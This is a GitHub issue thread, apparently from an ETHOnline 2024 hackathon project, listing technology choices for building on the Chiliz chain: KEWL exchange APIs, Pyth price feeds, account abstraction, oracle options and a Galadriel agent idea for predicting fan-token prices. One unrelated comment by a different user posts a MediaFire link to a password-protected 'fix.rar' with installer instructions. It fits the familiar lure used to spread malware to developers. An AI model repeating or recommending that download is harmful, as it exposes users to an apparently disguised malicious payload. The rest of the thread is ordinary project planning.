### ISSUE TITLE
技術選定

### ISSUE THREAD

**Issue by ikmzkro** [ikmzkro/ETHOnline-2024#7]
## KEWL APIs.
You can use the KEWL APIs.

https://api.kewl.exchange/explorer?dex=KAYEN

For all assets on Chiliz Chain
https://api.kewl.exchange/explorer

Token List
https://github.com/kewlexchange/assets/blob/main/chiliz/index.json

Bad gateway Error code 502で草

**Comment by ikmzkro** [comment]
## Pyth
Pythで価格モテるな。
https://docs.chiliz.com/develop/advanced/how-to-get-the-usd-price-of-fan-tokens#how-to-do-it-using-pyth

**Comment by ikmzkro** [comment]
## AA
AccountAbstracrionでUIUXを向上できる。
https://docs.chiliz.com/develop/advanced/how-to-use-account-abstraction

**Comment by ikmzkro** [comment]
## PSG? TOT?

https://www.coindesk.com/business/2024/02/22/paris-saint-germain-becomes-first-soccer-team-to-validate-a-blockchain/

https://medium.com/chiliz/paris-saint-germain-takes-landmark-step-forward-in-its-web3-strategy-by-becoming-official-validator-ac52e21a1ce7

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ikmzkro** [comment]
必要なデータによって異なります。 Azure プロトコルは、Chiliz チェーンの予測市場にオラクルを提供します。 
Chainlink は現時点では Chiliz Chain をサポートしていません。

**Comment by ikmzkro** [comment]
## Galadriel チェーン
Galadriel チェーンを活用してエージェントのチームを配置し、各エージェントがソーシャル メディアの感情を分析してスポーツ賭博の結果を予測することに重点を置きます。これらの予測を使用してファン トークンの価格変化を予測することができ、Chiliz でのそれらのトークンの戦略的な取引が可能になります。
